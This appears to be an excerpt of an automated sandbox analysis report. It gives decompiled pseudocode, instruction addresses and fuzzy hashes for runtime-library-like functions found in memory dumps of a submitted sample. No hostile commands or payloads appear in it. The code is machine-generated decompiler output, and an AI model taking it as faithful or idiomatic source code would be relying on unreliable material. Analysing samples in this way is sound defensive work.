								_t85 = E00441969(_t142, _t186,  *_t142,  &_v136);
								__eflags = _t85;
								if(_t85 != 0) {
									goto L22;
								} else {
									 *(_t142 + 8) =  *(_t142 + 8) | 0x00000200;
									_t182 = 0;
									__eflags =  *(_t142 + 0x10);
									if( *(_t142 + 0x10) == 0) {
										__eflags =  *(_t142 + 0xc);
										if( *(_t142 + 0xc) == 0) {
											goto L20;
										} else {
											_t121 = L00437E2A( *_t142);
											__eflags = _t121 -  *(_t142 + 0xc);
											if(_t121 !=  *(_t142 + 0xc)) {
												goto L20;
											} else {
												_t122 = E00446678(_t142, _t179, 0, _t186);
												__eflags = _t122;
												if(_t122 != 0) {
													goto L20;
												} else {
													_t123 = E004462E2( *_t142);
													_t124 = L00437E2A( *_t142);
													__eflags = _t123 - _t124;
													if(_t123 == _t124) {
														goto L22;
													} else {
														_t186 = _v140;
														goto L20;
													}
												}
											}
										}
									} else {
										L20:
										 *(_t142 + 8) =  *(_t142 + 8) | 0x00000100;
										__eflags =  *((intOrPtr*)(_t142 + 0x250)) - _t182;
										if( *((intOrPtr*)(_t142 + 0x250)) != _t182) {
											goto L22;
										} else {
											_t86 = L00437E2A(_t186);
											_t42 = _t142 + 0x250; // 0x2ec
											_t89 = E004442A7(_t42, 0x55, _t186, _t86 + 1);
											_t202 = _t201 + 0x14;
											__eflags = _t89;
											if(_t89 != 0) {
												goto L31;
											} else {
												goto L22;
											}
										}
									}
								}
							} else {
								goto L17;
							}
						}
					} else {
						asm("sbb eax, eax");
						_t131 = E004381D2(_t186, ( ~( *(_t142 + 0x10)) & 0xfffff002) + 0x1001,  &_v136, 0x40);
						_t199 = _t199 + 0x10;
						__eflags = _t131;
						if(_t131 == 0) {
							L17:
							 *(_t142 + 8) =  *(_t142 + 8) & 0x00000000;
							_t80 = 1;
							L23:
							_pop(_t180);
							goto L24;
						} else {
							_t133 = E00441969(_t142, _t186,  *_t142,  &_v136);
							_pop(_t177);
							__eflags = _t133;
							if(_t133 != 0) {
								__eflags =  *(_t142 + 8) & 0x00000002;
								if(( *(_t142 + 8) & 0x00000002) != 0) {
									goto L15;
								} else {
									__eflags =  *(_t142 + 0xc);
									if( *(_t142 + 0xc) == 0) {
										L12:
										__eflags =  *(_t142 + 8) & 0x00000001;
										if(( *(_t142 + 8) & 0x00000001) != 0) {
											goto L15;
										} else {
											_t134 = E00446678(_t142, _t179, 0xfffff002, _t186);
											__eflags = _t134;
											if(_t134 == 0) {
												goto L15;
											} else {
												 *(_t142 + 8) =  *(_t142 + 8) | 0x00000001;
												goto L6;
											}
										}
									} else {
										_t140 = L00449E7E(_t142, _t177, _t186,  *_t142,  &_v136,  *(_t142 + 0xc));
										_t199 = _t199 + 0xc;
										__eflags = _t140;
										if(_t140 != 0) {
											goto L12;
										} else {
											 *(_t142 + 8) =  *(_t142 + 8) | 0x00000002;
											goto L6;
										}
									}
								}
							} else {
								_t14 = _t142 + 8;
								 *_t14 =  *(_t142 + 8) | 0x00000304;
								__eflags =  *_t14;
								L6:
								_t135 = L00437E2A(_t186);
								_t16 = _t142 + 0x250; // 0x2ec
								_t138 = E004442A7(_t16, 0x55, _t186, _t135 + 1);
								_t199 = _t199 + 0x14;
								__eflags = _t138;
								if(_t138 == 0) {
									goto L15;
								} else {
									_t182 = 0;
									__eflags = 0;
									L31:
									_push(_t182);
									_push(_t182);
									_push(_t182);
									_push(_t182);
									_push(_t182);
									E00439530(_t142, _t179);
									asm("int3");
									_push(_t194);
									_t195 = _t202;
									_t91 =  *0x469acc; // 0x6f159cef
									_v180 = _t91 ^ _t195;
									_push(_t186);
									_push(_t182);
									_t183 = _v168;
									_t50 = L0043CC0F(_v168, __eflags) + 0x9c; // 0x9c
									_t188 = _t50;
									asm("sbb ecx, ecx");
									_t95 = E004381D2(_v168, ( ~( *(_t188 + 0x10)) & 0xfffff002) + 0x1001,  &_v420, 0x78);
									__eflags = _t95;
									if(_t95 != 0) {
										_t97 = E00441969(_t142, _t188,  *_t188,  &_v252);
										__eflags = _t97;
										if(_t97 != 0) {
											L37:
											_t101 =  !( *(_t188 + 8) >> 2) & 0x00000001;
											__eflags =  !( *(_t188 + 8) >> 2) & 0x00000001;
											goto L38;
										} else {
											_t103 = L00437E2A(_t183);
											_t56 = _t188 + 0x250; // 0x2ec
											_t106 = E004442A7(_t56, 0x55, _t183, _t103 + 1);
											__eflags = _t106;
											if(_t106 != 0) {
												_push(0);
												_push(0);
												_push(0);
												_push(0);
												_push(0);
												E00439530(_t142, _t179);
												asm("int3");
												_push(_t195);
												_push(_t188);
												_t190 = _v444;
												__eflags = _t190;
												if(_t190 == 0) {
													L48:
													_t112 = E004381D2(_v0 + 0x250, 0x20001004,  &_v4, 2);
													__eflags = _t112;
													if(_t112 != 0) {
														_t113 = _v4;
														__eflags = _t113;
														if(_t113 == 0) {
															return GetACP();
														}
													} else {
														goto L49;
													}
												} else {
													__eflags =  *_t190;
													if( *_t190 == 0) {
														goto L48;
													} else {
														_t115 = E004460A8(_t190, "ACP");
														__eflags = _t115;
														if(_t115 == 0) {
															goto L48;
														} else {
															_t116 = E004460A8(_t190, "OCP");
															__eflags = _t116;
															if(_t116 != 0) {
																_t113 = E0044B04A(_t190);
															} else {
																_t120 = E004381D2(_v0 + 0x250, 0x2000000b,  &_v4, 2);
																__eflags = _t120;
																if(_t120 == 0) {
																	L49:
																	_t113 = 0;
																} else {
																	_t113 = _v4;
																}
															}
														}
													}
												}
												return _t113;
											} else {
												_t57 = _t188 + 8;
												 *_t57 =  *(_t188 + 8) | 0x00000004;
												__eflags =  *_t57;
												goto L37;
											}
										}
									} else {
										 *(_t188 + 8) =  *(_t188 + 8) & _t95;
										_t101 = _t95 + 1;
										L38:
										_pop(_t184);
										__eflags = _v12 ^ _t195;
										_pop(_t189);
										return L00436D7B(_t101, _t142, _v12 ^ _t195, _t179, _t184, _t189);
									}
								}
							}
						}
					}
				} else {
					 *(_t142 + 8) =  *(_t142 + 8) & _t72;
					_t80 = _t72 + 1;
					L24:
					_pop(_t187);
					_pop(_t143);
					return L00436D7B(_t80, _t143, _v8 ^ _t194, _t179, _t180, _t187);
				}
			}

0x00446314
0x00446314
0x00446315
0x0044631d
0x00446324
0x00446327
0x00446329
0x0044632c
0x00446337
0x00446337
0x00446344
0x0044635b
0x00446360
0x00446365
0x00446370
0x0044637b
0x00446387
0x00446389
0x00446437
0x00446441
0x00446443
0x004464cb
0x004464d3
0x004464d3
0x00000000
0x00446449
0x0044644e
0x00446466
0x0044646b
0x0044646e
0x00446470
0x00446484
0x0044648b
0x0044648d
0x00000000
0x0044648f
0x0044648f
0x00446496
0x00446498
0x0044649b
0x004464e7
0x004464ea
0x00000000
0x004464ec
0x004464ee
0x004464f4
0x004464f7
0x00000000
0x004464f9
0x004464fa
0x00446500
0x00446502
0x00000000
0x00446504
0x00446506
0x0044650f
0x00446516
0x00446518
0x00000000
0x0044651a
0x0044651a
0x00000000
0x0044651a
0x00446518
0x00446502
0x004464f7
0x0044649d
0x0044649d
0x0044649d
0x004464a4
0x004464ab
0x00000000
0x004464ad
0x004464ae
0x004464b6
0x004464bf
0x004464c4
0x004464c7
0x004464c9
0x00000000
0x00000000
0x00000000
0x00000000
0x004464c9
0x004464ab
0x0044649b
0x00000000
0x00000000
0x00000000
0x00446470
0x0044638f
0x0044639d
0x004463a8
0x004463ad
0x004463b0
0x004463b2
0x00446472
0x00446472
0x00446478
0x004464d6
0x004464d6
0x00000000
0x004463b8
0x004463c1
0x004463c7
0x004463c8
0x004463ca
0x004463f6
0x004463fa
0x00000000
0x004463fc
0x004463fc
0x00446400
0x00446420
0x00446420
0x00446424
0x00000000
0x00446426
0x00446427
0x0044642d
0x0044642f
0x00000000
0x00446431
0x00446431
0x00000000
0x00446431
0x0044642f
0x00446402
0x0044640e
0x00446413
0x00446416
0x00446418
0x00000000
0x0044641a
0x0044641a
0x00000000
0x0044641a
0x00446418
0x00446400
0x004463cc
0x004463cc
0x004463cc
0x004463cc
0x004463d3
0x004463d4
0x004463dc
0x004463e5
0x004463ea
0x004463ed
0x004463ef
0x00000000
0x004463f1
0x00446525
0x00446525
0x00446527
0x00446527
0x00446528
0x00446529
0x0044652a
0x0044652b
0x0044652c
0x00446531
0x00446532
0x00446533
0x0044653b
0x00446542
0x00446545
0x00446546
0x00446547
0x0044654f
0x0044654f
0x0044655c
0x00446573
0x0044657b
0x0044657d
0x0044658e
0x00446595
0x00446597
0x004465bb
0x004465c3
0x004465c3
0x00000000
0x00446599
0x0044659a
0x004465a2
0x004465ab
0x004465b3
0x004465b5
0x004465d8
0x004465d9
0x004465da
0x004465db
0x004465dc
0x004465dd
0x004465e2
0x004465e3
0x004465e6
0x004465e7
0x004465ea
0x004465ec
0x00446645
0x00446659
0x00446661
0x00446663
0x00446669
0x0044666c
0x0044666e
0x00446672
0x00446672
0x00000000
0x00000000
0x00000000
0x004465ee
0x004465ee
0x004465f2
0x00000000
0x004465f4
0x004465fa
0x00446601
0x00446603
0x00000000
0x00446605
0x0044660b
0x00446612
0x00446614
0x0044663d
0x00446616
0x0044662a
0x00446632
0x00446634
0x00446665
0x00446665
0x00446636
0x00446636
0x00446636
0x00446634
0x00446614
0x00446603
0x004465f2
0x0044663b
0x004465b7
0x004465b7
0x004465b7
0x004465b7
0x00000000
0x004465b7
0x004465b5
0x0044657f
0x0044657f
0x00446582
0x004465c6
0x004465c9
0x004465ca
0x004465cc
0x004465d3
0x004465d3
0x0044657d
0x004463ef
0x004463ca
0x004463b2
0x00446367
0x00446367
0x0044636a
0x004464d7
0x004464da
0x004464dd
0x004464e4
0x004464e4

APIs

Part of subcall function 0043CC0F: __getptd_noexit.LIBCMT ref: 0043CC10

__invoke_watson.LIBCMT ref: 0044652C

Memory Dump Source

Source File: 00000000.00000001.1467662684.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.1467651208.00400000.00000002.sdmp Download File
Associated: 00000000.00000001.1468130389.0044D000.00000002.sdmp Download File
Associated: 00000000.00000001.1468513258.00469000.00000004.sdmp Download File
Associated: 00000000.00000001.1468552339.0046E000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: __getptd_noexit__invoke_watson
String ID:
API String ID: 2533157543-0
Opcode ID: 952425ee4f95f59dfd7abc43f2fe519144d4effef59cb236668e1116dc42aefc
Instruction ID: d0f9c5844b7e6e2322beb7cc268c1b23174d5d2f62b97c9cddcc1b95cc86abd4
Opcode Fuzzy Hash: 952425ee4f95f59dfd7abc43f2fe519144d4effef59cb236668e1116dc42aefc
Instruction Fuzzy Hash: 6C71E571600601AAFF149E25CC86B7B73ACEF02314F1580AFED45DA185EB7CDD85866E

Uniqueness

Uniqueness Score: -1,00%

Function 00402E6A, Relevance: 7.7, APIs: 5, Instructions: 245COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00402E6F
_memset.LIBCMT ref: 00403020
_memset.LIBCMT ref: 00403063
_malloc.LIBCMT ref: 0040309B
_free.LIBCMT ref: 004030DD

Memory Dump Source

Source File: 00000000.00000001.1467662684.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.1467651208.00400000.00000002.sdmp Download File
Associated: 00000000.00000001.1468130389.0044D000.00000002.sdmp Download File
Associated: 00000000.00000001.1468513258.00469000.00000004.sdmp Download File
Associated: 00000000.00000001.1468552339.0046E000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: _memset$H_prolog_free_malloc
String ID:
API String ID: 515261262-0
Opcode ID: 4e7f6efc129910742192b9290a58e582e352d2ffd590b946ca129e91764a0489
Instruction ID: 93bba5dd76a06e19689bc044bf42de31cd379d28843a871c8756f7a0403ed8ff
Opcode Fuzzy Hash: 4e7f6efc129910742192b9290a58e582e352d2ffd590b946ca129e91764a0489
Instruction Fuzzy Hash: 7C8128716083815FD3119F2998907ABBFE8AB99308F04087EF5C5973C3D6B9C949C76A

Uniqueness

Uniqueness Score: -1,00%

Function 004403EC, Relevance: 7.6, APIs: 5, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E004403EC(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
				void* _t7;
				long _t8;
				intOrPtr* _t9;
				intOrPtr* _t12;
				long _t20;
				long _t31;

				if(_a4 != 0) {
					_t31 = _a8;
					__eflags = _t31;
					if(_t31 != 0) {
						_push(__ebx);
						while(1) {
							__eflags = _t31 - 0xffffffe0;
							if(_t31 > 0xffffffe0) {
								break;
							}
							__eflags = _t31;
							if(_t31 == 0) {
								_t31 = _t31 + 1;
								__eflags = _t31;
							}
							_t7 = HeapReAlloc( *0x46c3e0, 0, _a4, _t31);
							_t20 = _t7;
							__eflags = _t20;
							if(_t20 != 0) {
								L17:
								_t8 = _t20;
							} else {
								__eflags =  *0x46c3e4 - _t7;
								if(__eflags == 0) {
									_t9 = L00437D6A(__eflags);
									 *_t9 = L00437D7D(GetLastError());
									goto L17;
								} else {
									__eflags = E0043915E(_t7, _t31);
									if(__eflags == 0) {
										_t12 = L00437D6A(__eflags);
										 *_t12 = L00437D7D(GetLastError());
										L12:
										_t8 = 0;
										__eflags = 0;
									} else {
										continue;
									}
								}
							}
							goto L14;
						}
						E0043915E(_t6, _t31);
						 *((intOrPtr*)(L00437D6A(__eflags))) = 0xc;
						goto L12;
					} else {
						E00431794(_a4);
						_t8 = 0;
					}
					L14:
					return _t8;
				} else {
					return E004317CC(__ebx, __edx, __edi, _a8);
				}
			}

0x004403f3
0x00440401
0x00440404
0x00440406
0x00440415
0x00440448
0x00440448
0x0044044b
0x00000000
0x00000000
0x00440418
0x0044041a
0x0044041c
0x0044041c
0x0044041c
0x00440429
0x0044042f
0x00440431
0x00440433
0x00440493
0x00440493
0x00440435
0x00440435
0x0044043b
0x0044047d
0x00440491
0x00000000
0x0044043d
0x00440444
0x00440446
0x00440465
0x00440479
0x0044045f
0x0044045f
0x0044045f
0x00000000
0x00000000
0x00000000
0x00440446
0x0044043b
0x00000000
0x00440461
0x0044044e
0x00440459
0x00000000
0x00440408
0x0044040b
0x00440411
0x00440411
0x00440462
0x00440464
0x004403f5
0x004403ff
0x004403ff

APIs

_malloc.LIBCMT ref: 004403F8

Part of subcall function 004317CC: __FF_MSGBANNER.LIBCMT ref: 004317E3
Part of subcall function 004317CC: __NMSG_WRITE.LIBCMT ref: 004317EA
Part of subcall function 004317CC: RtlAllocateHeap.NTDLL(002F0000,00000000,00000001,00000000,00000000,00000000,?,00437514,00000000,00000000,00000000,00000000,?,00435EA2,00000018,004677C0), ref: 0043180F

_free.LIBCMT ref: 0044040B

Memory Dump Source

Source File: 00000000.00000001.1467662684.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.1467651208.00400000.00000002.sdmp Download File
Associated: 00000000.00000001.1468130389.0044D000.00000002.sdmp Download File
Associated: 00000000.00000001.1468513258.00469000.00000004.sdmp Download File
Associated: 00000000.00000001.1468552339.0046E000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: AllocateHeap_free_malloc
String ID:
API String ID: 1020059152-0
Opcode ID: c0d7701c83856587110b37217f8f757d52f2ebe71c2d95cfff1175f035972ddf
Instruction ID: c9bfc2e0d31e0326c060cfa6c7f63cd4d0d7867af7ad4104674739ba51d3178d
Opcode Fuzzy Hash: c0d7701c83856587110b37217f8f757d52f2ebe71c2d95cfff1175f035972ddf
Instruction Fuzzy Hash: 6111CA71904215AAEB303F71AC4566A37949F09379F10843FFB899A361EA3D88518A9D

Uniqueness

Uniqueness Score: -1,00%

Function 00414580, Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 422
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E00414580(char _a4) {
				signed int _v8;
				char _v12;
				signed int _v16;
				signed short* _v20;
				char _v276;
				char _v1044;
				signed int _v1048;
				signed int _v1052;
				intOrPtr _v1056;
				char _v1060;
				intOrPtr* _v1064;
				signed short* _v1068;
				signed int _v1072;
				signed int _v1073;
				signed int _v1080;
				signed int _v1084;
				intOrPtr _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				void* _t293;
				char _t309;
				char _t316;
				char _t319;
				char _t322;
				void* _t548;
				void* _t549;
				void* _t551;

				_t1 =  &_a4; // 0x413d21
				_v1064 =  *((intOrPtr*)( *_t1));
				_t3 =  &_a4; // 0x413d21
				_v20 =  *((intOrPtr*)( *_t3 + 0xc));
				if( *((intOrPtr*)(_v1064 + 0x18)) <= 0x100) {
					_v1088 =  *((intOrPtr*)(_v1064 + 0x18));
				} else {
					_v1088 = 0x100;
				}
				_v1056 = _v1088;
				_v1052 =  *((intOrPtr*)(_v1064 + 0x10));
				_v1048 = (_v1052 & 0x00000003) + 1;
				if((_v1052 & 0x00000020) == 0 || (_v1052 & 0x00000001) == 0) {
					_v1092 = 0;
				} else {
					_v1092 = 1;
				}
				_v16 = _v1092;
				asm("sbb edx, edx");
				_v8 =  ~(_v1052 & 0x00000010) & 0x00000002;
				E004345E0( &_v276, 0xff, 0x100);
				E004345E0( &_v1044, 0, 0x300);
				_t551 = _t549 + 0x18;
				_v1060 = 0;
				_v12 = _v1060;
				while(1) {
					_t34 =  &_v12; // 0x413d21
					if( *_t34 >= _v1056) {
						break;
					}
					if((_v1052 & 0x00000004) == 0) {
						_v1084 = _v20;
						_t198 =  &_v12; // 0x413d21
						_v1084 =  *_t198 * _v1048 + _v1084;
						_v1100 = _v1048;
						_v1100 = _v1100 - 1;
						if(_v1100 > 3) {
							L36:
							_v12 = _v12 + 1;
							continue;
						}
						switch( *((intOrPtr*)(_v1100 * 4 +  &M00414CA8))) {
							case 0:
								L35:
								_t252 =  &_v12; // 0x413d21
								 *_t252 =  *_t252 * 3;
								_v1084 = _v1084 + _v16;
								 *((char*)(__ebp +  *_t252 * 3 - 0x40f)) =  *((intOrPtr*)(_v1084 + _v16));
								_t257 =  &_v12; // 0x413d21
								 *_t257 =  *_t257 * 3;
								_t258 =  &_v12; // 0x413d21
								 *_t258 =  *_t258 * 3;
								 *((char*)(__ebp +  *_t258 * 3 - 0x410)) =  *((intOrPtr*)(__ebp +  *_t257 * 3 - 0x40f));
								_t263 =  &_v12; // 0x413d21
								__eax =  *_t263;
								__eax =  *_t263 * 3;
								_t264 =  &_v12; // 0x413d21
								 *_t264 =  *_t264 * 3;
								 *((char*)(__ebp +  *_t264 * 3 - 0x40e)) =  *((intOrPtr*)(__ebp + __eax - 0x410));
								goto L36;
							case 1:
								_t242 =  &_v12; // 0x413d21
								__eax =  *_t242;
								__ecx = _v1084;
								 *((char*)(__ebp +  *_t242 - 0x110)) =  *((intOrPtr*)(_v1084 + (_v16 ^ 0x00000001)));
								_t247 =  &_v12; // 0x413d21
								__eax =  *_t247;
								__ecx =  *(__ebp + __eax - 0x110) & 0x000000ff;
								if(( *(__ebp + __eax - 0x110) & 0x000000ff) < 0xff) {
									_t250 =  &_v12; // 0x413d21
									_v1060 =  *_t250 + 1;
								}
								goto L35;
							case 2:
								L32:
								_t223 =  &_v12; // 0x413d21
								 *((char*)(_t548 +  *_t223 * 3 - 0x40e)) =  *((intOrPtr*)(_v1084 + (_v8 ^ 0x00000002) + _v16));
								_t228 =  &_v12; // 0x413d21
								 *((char*)(_t548 +  *_t228 * 3 - 0x40f)) =  *((intOrPtr*)(_v1084 + _v16 + 1));
								_t236 =  &_v12; // 0x413d21
								 *((char*)(_t548 +  *_t236 * 3 - 0x410)) =  *((intOrPtr*)(_v1084 + _v16 + _v8));
								goto L36;
							case 3:
								asm("sbb edx, edx");
								_t211 =  &_v12; // 0x413d21
								 *((char*)(_t548 +  *_t211 - 0x110)) =  *((intOrPtr*)(_v1084 + ( ~_v16 & 0xfffffffd) + 3));
								_t216 =  &_v12; // 0x413d21
								if(( *(_t548 +  *_t216 - 0x110) & 0x000000ff) < 0xff) {
									_t219 =  &_v12; // 0x413d21
									_v1060 =  *_t219 + 1;
								}
								goto L32;
						}
					}
					_v1068 = _v20;
					_t39 =  &_v12; // 0x413d21
					_v1068 =  &(_v1068[ *_t39 * _v1048]);
					if((_v1048 & 0x00000001) == 0) {
						if(_v16 == 0) {
							_v1096 = _v1048 - 1;
						} else {
							_v1096 = 0;
						}
						_v1072 = _v1068[_v1096];
						_v1073 = 0x807f + (_v1072 & 0x0000ffff) * 0xff >> 0x10;
						_v1080 = 0;
						if((_v1073 & 0x000000ff) > 0 && (_v1073 & 0x000000ff) < 0xff) {
							asm("cdq");
							_v1080 = (((_v1072 & 0x0000ffff) >> 1) + 0x7f7f8080) / (_v1072 & 0x0000ffff);
						}
						_t137 =  &_v12; // 0x413d21
						 *((char*)(_t548 +  *_t137 - 0x110)) = _v1073;
						if((_v1073 & 0x000000ff) < 0xff) {
							_t142 =  &_v12; // 0x413d21
							_v1060 =  *_t142 + 1;
						}
						if(_v1048 < 3) {
							_t309 = E004144F0(_v1068[_v16] & 0x0000ffff, _v1072 & 0x0000ffff, _v1080);
							_t551 = _t551 + 0xc;
							_t181 =  &_v12; // 0x413d21
							 *((char*)(_t548 +  *_t181 * 3 - 0x40f)) = _t309;
							_t184 =  &_v12; // 0x413d21
							_t185 =  &_v12; // 0x413d21
							 *((char*)(_t548 +  *_t185 * 3 - 0x410)) =  *((intOrPtr*)(_t548 +  *_t184 * 3 - 0x40f));
							_t190 =  &_v12; // 0x413d21
							_t191 =  &_v12; // 0x413d21
							 *((char*)(_t548 +  *_t191 * 3 - 0x40e)) =  *((intOrPtr*)(_t548 +  *_t190 * 3 - 0x410));
						} else {
							_t316 = E004144F0(_v1068[(_v8 ^ 0x00000002) + _v16] & 0x0000ffff, _v1072 & 0x0000ffff, _v1080);
							_t152 =  &_v12; // 0x413d21
							 *((char*)(_t548 +  *_t152 * 3 - 0x40e)) = _t316;
							_t319 = E004144F0( *(_v1068 + 2 + _v16 * 2) & 0x0000ffff, _v1072 & 0x0000ffff, _v1080);
							_t162 =  &_v12; // 0x413d21
							 *((char*)(_t548 +  *_t162 * 3 - 0x40f)) = _t319;
							_t322 = E004144F0(_v1068[_v16 + _v8] & 0x0000ffff, _v1072 & 0x0000ffff, _v1080);
							_t551 = _t551 + 0x24;
							_t172 =  &_v12; // 0x413d21
							 *((char*)(_t548 +  *_t172 * 3 - 0x410)) = _t322;
						}
					} else {
						if(_v1048 < 3) {
							_t101 =  &_v12; // 0x413d21
							 *((char*)(_t548 +  *_t101 * 3 - 0x40f)) = ( *(0x44f350 + (( *_v1068 & 0x0000ffff) * 0xff >> 0xf) * 2) & 0x0000ffff) + ((( *_v1068 & 0x0000ffff) * 0x000000ff & 0x00007fff) * ( *((( *_v1068 & 0x0000ffff) * 0xff >> 0xf) + 0x44f750) & 0x000000ff) >> 0x0000000c) >> 0x00000008 & 0x000000ff;
							_t104 =  &_v12; // 0x413d21
							_t105 =  &_v12; // 0x413d21
							 *((char*)(_t548 +  *_t105 * 3 - 0x410)) =  *((intOrPtr*)(_t548 +  *_t104 * 3 - 0x40f));
							_t110 =  &_v12; // 0x413d21
							_t111 =  &_v12; // 0x413d21
							 *((char*)(_t548 +  *_t111 * 3 - 0x40e)) =  *((intOrPtr*)(_t548 +  *_t110 * 3 - 0x410));
						} else {
							_t62 =  &_v12; // 0x413d21
							 *((char*)(_t548 +  *_t62 * 3 - 0x40e)) = ( *(0x44f350 + ((_v1068[_v8 ^ 0x00000002] & 0x0000ffff) * 0xff >> 0xf) * 2) & 0x0000ffff) + (((_v1068[_v8 ^ 0x00000002] & 0x0000ffff) * 0x000000ff & 0x00007fff) * ( *(((_v1068[_v8 ^ 0x00000002] & 0x0000ffff) * 0xff >> 0xf) + 0x44f750) & 0x000000ff) >> 0x0000000c) >> 0x00000008 & 0x000000ff;
							_t74 =  &_v12; // 0x413d21
							 *((char*)(_t548 +  *_t74 * 3 - 0x40f)) = ( *(0x44f350 + ((_v1068[1] & 0x0000ffff) * 0xff >> 0xf) * 2) & 0x0000ffff) + (((_v1068[1] & 0x0000ffff) * 0x000000ff & 0x00007fff) * ( *(((_v1068[1] & 0x0000ffff) * 0xff >> 0xf) + 0x44f750) & 0x000000ff) >> 0x0000000c) >> 0x00000008 & 0x000000ff;
							_t92 =  &_v12; // 0x413d21
							 *((char*)(_t548 +  *_t92 * 3 - 0x410)) = ( *(0x44f350 + ((_v1068[_v8] & 0x0000ffff) * 0xff >> 0xf) * 2) & 0x0000ffff) + (((_v1068[_v8] & 0x0000ffff) * 0x000000ff & 0x00007fff) * ( *(((_v1068[_v8] & 0x0000ffff) * 0xff >> 0xf) + 0x44f750) & 0x000000ff) >> 0x0000000c) >> 0x00000008 & 0x000000ff;
						}
					}
					goto L36;
				}
				_t293 = E004251A0( *_v1064,  *((intOrPtr*)( *_v1064)),  *((intOrPtr*)( *_v1064 + 4)),  &_v1044, _v1056);
				if(_v1060 > 0) {
					_t293 = E00425940( *((intOrPtr*)( *_v1064)), _v1064,  *((intOrPtr*)( *_v1064)),  *((intOrPtr*)( *_v1064 + 4)),  &_v276, _v1060, 0);
				}
				 *((intOrPtr*)(_v1064 + 0x18)) = _v1056;
				return _t293;
			}

0x0041458a
0x0041458f
0x00414595
0x0041459b
0x004145ab
0x004145c2
0x004145ad
0x004145ad
0x004145ad
0x004145ce
0x004145dd
0x004145ef
0x004145fe
0x00414617
0x0041460b
0x0041460b
0x0041460b
0x00414627
0x00414635
0x0041463a
0x0041464e
0x00414664
0x00414669
0x0041466c
0x0041467c
0x0041468a
0x0041468a
0x00414693
0x00000000
0x00000000
0x004146a2
0x00414aba
0x00414ac0
0x00414ad0
0x00414adc
0x00414aeb
0x00414af8
0x00414c27
0x00414687
0x00000000
0x00414687
0x00414b04
0x00000000
0x00414bdb
0x00414bdb
0x00414bde
0x00414be7
0x00414bec
0x00414bf3
0x00414bf6
0x00414bf9
0x00414bfc
0x00414c06
0x00414c0d
0x00414c0d
0x00414c10
0x00414c13
0x00414c16
0x00414c20
0x00000000
0x00000000
0x00414ba9
0x00414ba9
0x00414bac
0x00414bb5
0x00414bbc
0x00414bbc
0x00414bbf
0x00414bcd
0x00414bcf
0x00414bd5
0x00414bd5
0x00000000
0x00000000
0x00414b4a
0x00414b53
0x00414b62
0x00414b69
0x00414b7b
0x00414b88
0x00414b97
0x00000000
0x00000000
0x00414b10
0x00414b18
0x00414b24
0x00414b2b
0x00414b3c
0x00414b3e
0x00414b44
0x00414b44
0x00000000
0x00000000
0x00414b04
0x004146ab
0x004146b1
0x004146c4
0x004146d3
0x004148e0
0x004148f7
0x004148e2
0x004148e2
0x004148e2
0x0041490d
0x0041492a
0x00414930
0x00414943
0x00414969
0x0041496c
0x0041496c
0x00414972
0x0041497b
0x0041498f
0x00414991
0x00414997
0x00414997
0x004149a4
0x00414a69
0x00414a6e
0x00414a71
0x00414a77
0x00414a7e
0x00414a84
0x00414a91
0x00414a98
0x00414a9e
0x00414aab
0x004149aa
0x004149cd
0x004149d5
0x004149db
0x00414a00
0x00414a08
0x00414a0e
0x00414a35
0x00414a3a
0x00414a3d
0x00414a43
0x00414a43
0x004146d9
0x004146e0
0x00414896
0x0041489c
0x004148a3
0x004148a9
0x004148b6
0x004148bd
0x004148c3
0x004148d0
0x004146e6
0x00414753
0x00414759
0x004147bb
0x004147c1
0x0041482c
0x00414832
0x00414832
0x004148d7
0x00000000
0x00414ab2
0x00414c51
0x00414c60
0x00414c89
0x00414c8e
0x00414c9d
0x00414ca4

APIs

_memset.LIBCMT ref: 0041464E
_memset.LIBCMT ref: 00414664

Strings

!=A, xrefs: 0041458A, 00414595
!=A, xrefs: 0041468A, 00414AC0, 00414BDB, 00414BF3, 00414BF9, 00414C0D, 00414C13, 00414BA9, 00414BBC, 00414BCF, 00414B53, 00414B69, 00414B88, 00414B18, 00414B2B, 00414B3E, 004146B1, 00414972, 00414A71, 00414A7E, 00414A84, 00414A98, 00414A9E, 004149D5, 00414A08, 00414A3D, 00414991, 00414896, 004148A3, 004148A9, 004148BD, 004148C3, 00414753, 004147BB, 0041482C

Memory Dump Source

Source File: 00000000.00000001.1467662684.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.1467651208.00400000.00000002.sdmp Download File
Associated: 00000000.00000001.1468130389.0044D000.00000002.sdmp Download File
Associated: 00000000.00000001.1468513258.00469000.00000004.sdmp Download File
Associated: 00000000.00000001.1468552339.0046E000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: _memset
String ID: !=A$!=A
API String ID: 2102423945-1413326298
Opcode ID: 142c849ae4ed7f1568dd1fcb11c71c7597aac3b1ca2a48add3d3be2c9850b80a
Instruction ID: 76928ead3fc1976e13c1454133e83a4f13f93b455b55413dc09e670dda61d852
Opcode Fuzzy Hash: 142c849ae4ed7f1568dd1fcb11c71c7597aac3b1ca2a48add3d3be2c9850b80a
Instruction Fuzzy Hash: 94225FB1E041598BCB28CF54D9907ECBBB6EF98304F1481E9E6496B785C7345AC1CF58

Uniqueness

Uniqueness Score: -1,00%

Function 004387BD, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 185COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 0043884D

Part of subcall function 00441D10: __87except.LIBCMT ref: 00441D4B

Strings

pow, xrefs: 00438825, 00438842

Memory Dump Source

Source File: 00000000.00000001.1467662684.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

